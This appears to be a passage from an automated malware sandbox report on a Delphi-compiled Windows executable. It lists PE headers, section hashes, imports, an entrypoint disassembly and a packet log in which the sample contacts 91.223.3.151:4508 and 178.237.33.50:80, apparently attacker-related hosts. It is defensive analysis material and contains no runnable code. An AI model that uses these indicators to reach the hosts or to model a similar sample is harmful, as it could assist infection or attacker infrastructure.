                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                  File Version Major:4
                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                  Import Hash:24201b9cc75fb3152043567a88788f77

                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                  Instruction
                                                                                                                                                                  push ebp
                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                  add esp, FFFFFFF0h
                                                                                                                                                                  mov eax, 00457598h
                                                                                                                                                                  call 00007F91FD4D4371h
                                                                                                                                                                  mov eax, dword ptr [0056D9CCh]
                                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                                  call 00007F91FD51E5A1h
                                                                                                                                                                  mov ecx, dword ptr [0056D8F8h]
                                                                                                                                                                  mov eax, dword ptr [0056D9CCh]
                                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                                  mov edx, dword ptr [004573A8h]
                                                                                                                                                                  call 00007F91FD51E5A1h
                                                                                                                                                                  mov eax, dword ptr [0056D9CCh]
                                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                                  call 00007F91FD51E615h
                                                                                                                                                                  call 00007F91FD4D23ECh
                                                                                                                                                                  lea eax, dword ptr [eax+00h]
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al

                                                                                                                                                                  Data Directories

                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1720000x2458.idata
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x17e0000x1d600.rsrc
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1770000x6004.reloc
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x1760000x18.rdata
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x1726c40x5ac.idata
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                  Sections

                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                  .text0x10000x567a80x568006a621138800e4fc13ef140de97c6996fFalse0.5254103820447977data6.528612856084684IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .itext0x580000x78c0x8000e9c13d49823b5ca1d42064cbd1f0092False0.599609375data6.053557254879556IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .data0x590000x114b4c0x114c003acb4562bcf371fa16f2a119d4b75641False0.7514926321138211data7.616808019743606IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  .bss0x16e0000x366c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  .idata0x1720000x24580x2600c85b3f4d3bbb9ee5349ade0f29b833d0False0.3120888157894737data5.039584381610788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  .tls0x1750000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  .rdata0x1760000x180x20088744f318d155b3dd9496b461da5975cFalse0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .reloc0x1770000x60040x62002a6ccb22f49dc9fd8aaf7def97e5b3baFalse0.6501116071428571data6.6666599437422525IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .rsrc0x17e0000x1d6000x1d6005081eacda8ebfe8b68766e525cc078a1False0.14349235372340424data4.253899981413597IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                  Resources

                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                  RT_CURSOR0x17eb4c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                  RT_CURSOR0x17ec800x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                                  RT_CURSOR0x17edb40x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                                  RT_CURSOR0x17eee80x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                                  RT_CURSOR0x17f01c0x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                                  RT_CURSOR0x17f1500x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                  RT_CURSOR0x17f2840x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                  RT_BITMAP0x17f3b80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                                                  RT_BITMAP0x17f5880x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                                                                  RT_BITMAP0x17f76c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                                                  RT_BITMAP0x17f93c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                                                                  RT_BITMAP0x17fb0c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                                                                  RT_BITMAP0x17fcdc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                                                                  RT_BITMAP0x17feac0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                                                                  RT_BITMAP0x18007c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                                                  RT_BITMAP0x18024c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                                                                  RT_BITMAP0x18041c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                                                  RT_BITMAP0x1805ec0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                                                                  RT_ICON0x1806d40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.28635084427767354
                                                                                                                                                                  RT_ICON0x18177c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.18278008298755186
                                                                                                                                                                  RT_ICON0x183d240x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m0.11275415896487985
                                                                                                                                                                  RT_ICON0x1891ac0x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 3779 x 3779 px/m0.10086466165413534
                                                                                                                                                                  RT_ICON0x18f9940x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m0.08608366617616145
                                                                                                                                                                  RT_DIALOG0x198e3c0x52data0.7682926829268293
                                                                                                                                                                  RT_DIALOG0x198e900x52data0.7560975609756098
                                                                                                                                                                  RT_STRING0x198ee40x2cdata0.4772727272727273
                                                                                                                                                                  RT_STRING0x198f100x2b4data0.476878612716763
                                                                                                                                                                  RT_STRING0x1991c40xb4data0.6888888888888889
                                                                                                                                                                  RT_STRING0x1992780xe8data0.6422413793103449
                                                                                                                                                                  RT_STRING0x1993600x2a8data0.4764705882352941
                                                                                                                                                                  RT_STRING0x1996080x3e8data0.382
                                                                                                                                                                  RT_STRING0x1999f00x370data0.4022727272727273
                                                                                                                                                                  RT_STRING0x199d600x3ccdata0.33539094650205764
                                                                                                                                                                  RT_STRING0x19a12c0x214data0.49624060150375937
                                                                                                                                                                  RT_STRING0x19a3400xccdata0.6274509803921569
                                                                                                                                                                  RT_STRING0x19a40c0x194data0.5643564356435643
                                                                                                                                                                  RT_STRING0x19a5a00x3c4data0.3288381742738589
                                                                                                                                                                  RT_STRING0x19a9640x338data0.42961165048543687
                                                                                                                                                                  RT_STRING0x19ac9c0x294data0.42424242424242425
                                                                                                                                                                  RT_RCDATA0x19af300x10data1.5
                                                                                                                                                                  RT_RCDATA0x19af400x298data0.7364457831325302
                                                                                                                                                                  RT_RCDATA0x19b1d80x15eDelphi compiled form 'TfrmMain'0.7571428571428571
                                                                                                                                                                  RT_GROUP_CURSOR0x19b3380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                  RT_GROUP_CURSOR0x19b34c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                  RT_GROUP_CURSOR0x19b3600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                  RT_GROUP_CURSOR0x19b3740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                  RT_GROUP_CURSOR0x19b3880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                  RT_GROUP_CURSOR0x19b39c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                  RT_GROUP_CURSOR0x19b3b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                  RT_GROUP_ICON0x19b3c40x4cdata0.8421052631578947

                                                                                                                                                                  Imports

                                                                                                                                                                  DLLImport
                                                                                                                                                                  oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                                  user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                                                  kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                                                                  kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                                                  user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                                  gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                                                                                                                  version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                                                  kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                                                                                  kernel32.dllSleep
                                                                                                                                                                  oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                                                                  comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                                                                                                                                                                  Possible Origin

                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                  Network Behavior

                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                  TCP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Apr 24, 2024 17:03:57.808535099 CEST49730443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:03:57.808583021 CEST4434973013.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:03:57.808655024 CEST49730443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:03:57.808737993 CEST49730443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:03:57.808888912 CEST4434973013.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:03:57.808955908 CEST49730443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:03:57.832969904 CEST49731443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:03:57.833003998 CEST4434973113.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:03:57.833076000 CEST49731443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:03:57.836563110 CEST49731443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:03:57.836577892 CEST4434973113.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:03:58.382232904 CEST4434973113.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:03:58.382309914 CEST49731443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:03:58.387886047 CEST49731443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:03:58.387895107 CEST4434973113.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:03:58.388303995 CEST4434973113.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:03:58.442033052 CEST49731443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:03:58.509185076 CEST49731443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:03:58.556118011 CEST4434973113.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:03:58.825026035 CEST4434973113.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:03:58.825248003 CEST4434973113.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:03:58.825323105 CEST49731443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:03:58.827630997 CEST49731443192.168.2.413.107.139.11
                                                                                                                                                                  Apr 24, 2024 17:03:58.827647924 CEST4434973113.107.139.11192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:01.507884979 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:01.834718943 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:01.836837053 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:01.842272997 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:02.171756029 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:02.227026939 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:02.551611900 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:02.557598114 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:02.931490898 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:02.931549072 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:03.298192024 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:03.678930044 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:03.680813074 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:04.005471945 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:04.010207891 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:04.052968025 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:04.226881981 CEST4973580192.168.2.4178.237.33.50
                                                                                                                                                                  Apr 24, 2024 17:04:04.337251902 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:04.337342978 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:04.340904951 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:04.532725096 CEST8049735178.237.33.50192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:04.532828093 CEST4973580192.168.2.4178.237.33.50
                                                                                                                                                                  Apr 24, 2024 17:04:04.533046007 CEST4973580192.168.2.4178.237.33.50
                                                                                                                                                                  Apr 24, 2024 17:04:04.669971943 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:04.724807978 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:04.840662956 CEST8049735178.237.33.50192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:04.840744019 CEST4973580192.168.2.4178.237.33.50
                                                                                                                                                                  Apr 24, 2024 17:04:04.889837027 CEST497334508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:05.049566031 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:05.064604044 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:05.267168045 CEST45084973391.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:05.439177036 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:05.439282894 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:05.776268005 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:05.776285887 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:05.776298046 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:05.776310921 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:05.776328087 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:05.776340008 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:05.776352882 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:05.776354074 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:05.776365995 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:05.776380062 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:05.776382923 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:05.776393890 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:05.776437044 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:05.776437044 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:05.841237068 CEST8049735178.237.33.50192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:05.841324091 CEST4973580192.168.2.4178.237.33.50
                                                                                                                                                                  Apr 24, 2024 17:04:06.103101969 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:06.103120089 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:06.103178024 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:06.103218079 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:06.103259087 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:06.103329897 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:06.103339911 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:06.103399992 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:06.103410006 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:06.103461027 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:06.103513002 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:06.103537083 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:06.103579044 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:06.103657961 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:06.103672981 CEST45084973491.223.3.151192.168.2.4
                                                                                                                                                                  Apr 24, 2024 17:04:06.103687048 CEST497344508192.168.2.491.223.3.151
                                                                                                                                                                  Apr 24, 2024 17:04:06.103734016 CEST497344508192.168.2.491.223.3.151
